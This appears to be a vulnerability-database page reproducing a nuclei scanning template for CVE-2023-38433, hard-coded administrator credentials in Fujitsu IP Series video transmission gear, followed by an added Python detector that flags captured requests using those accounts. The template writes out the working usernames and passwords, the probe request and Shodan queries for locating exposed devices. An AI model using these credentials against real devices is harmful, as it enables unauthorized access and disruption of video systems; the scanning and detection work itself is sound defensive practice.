Fujitsu IP Series - Hardcoded Credentials

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Fujitsu IP Series devices use hard-coded credentials that allow a remote attacker to gain unauthorized access and terminate video transmission. CVE-2023-38433

id: CVE-2023-38433

info:
  name: Fujitsu IP Series - Hardcoded Credentials
  author: AdnaneKhan
  severity: high
  description: |
    Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network.
  reference:
    - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38433
    - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
    - https://www.fujitsu.com/global/products/computing/peripheral/video/download
    - https://jvn.jp/en/jp/JVN95727578
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-38433
    cwe-id: CWE-798
    epss-score: 0.0299
    epss-percentile: 0.85654
    cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: fujitsu
    product: ip-he950e_firmware
    shodan-query:
      - '"Server: thttpd/2.25b 29dec2003" content-length:1133'
      - '"server: thttpd/2.25b 29dec2003" content-length:1133'
    max-req: 1
  tags: cve2023,cve,fujitsu,ip-series,vkev,vuln

http:
  - raw:
      - |
        GET /b_download/index.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - fedish264pro
        - fedish265pro
      password:
        - h264pro@broadsight
        - h265pro@broadsight

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Field Support'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100afc665fa5c086f88ea7a8da4737285243861417631dd3c5e9ef3337a9f2b3ac5022065afd186da05f017f09baa174adf67936e70f09ca674fb632dc37b3b0c2deee7:922c64590222798bb761d5b6d8e72950
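
A defender-side check for use of these accounts, as an added example that is not part of the nuclei template or the vendor's code: it scans captured HTTP requests for Basic authentication with either hard-coded account name and notes whether the request hit the path the template probes. The record layout (`src`, `request`), the sample capture, the `encoder.example` host and the `/status.html` path are assumptions constructed for illustration.

```python
import base64
import re

# Account names and probe path are taken from the template on this page.
HARDCODED_USERS = {"fedish264pro", "fedish265pro"}
TEMPLATE_PATH = "/b_download/index.html"
REQUEST_LINE = re.compile(r"^[A-Z]+ (\S+) HTTP/\d\.\d$")

def basic_auth_user(header_value):
    """Return the username carried in a Basic Authorization value, else None."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, sep, _ = decoded.decode("utf-8", "replace").partition(":")
    return user if sep else None

def flag_requests(records):
    """Return one finding per captured request that uses a hard-coded account."""
    findings = []
    for rec in records:
        lines = rec["request"].splitlines()
        match = REQUEST_LINE.match(lines[0]) if lines else None
        parts = (line.partition(":") for line in lines[1:])
        headers = {name.strip().lower(): value for name, sep, value in parts if sep}
        user = basic_auth_user(headers.get("authorization", ""))
        if user in HARDCODED_USERS:
            path = match.group(1).split("?")[0] if match else None
            findings.append({"src": rec["src"], "user": user, "path": path,
                             "template_path": path == TEMPLATE_PATH})
    return findings

def _req(path, auth):  # builds one constructed sample request
    return f"GET {path} HTTP/1.1\nHost: encoder.example\nAuthorization: {auth}\n"

def _basic(user):  # placeholder password: detection keys on the account name only
    return "Basic " + base64.b64encode(f"{user}:placeholder".encode()).decode()

# Constructed sample capture (documentation address ranges, not real traffic).
SAMPLE = [
    {"src": "192.0.2.10", "request": _req(TEMPLATE_PATH, _basic("fedish264pro"))},
    {"src": "192.0.2.11", "request": _req("/index.html", _basic("operator"))},
    {"src": "198.51.100.7", "request": _req("/status.html", _basic("fedish265pro"))},
    {"src": "198.51.100.8", "request": _req("/index.html", "Basic !!!not-base64")},
]

if __name__ == "__main__":
    print(*flag_requests(SAMPLE), sep="\n")
```

Because the description states the credentials cannot be changed by the end-user, any request carrying either account name is worth reviewing, whichever path it targets.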

04 Feb 2026 07:00 (current)
Vulners AI Score: 6.8 (medium risk)
CVSS 3.1: 7.5
EPSS: 0.0299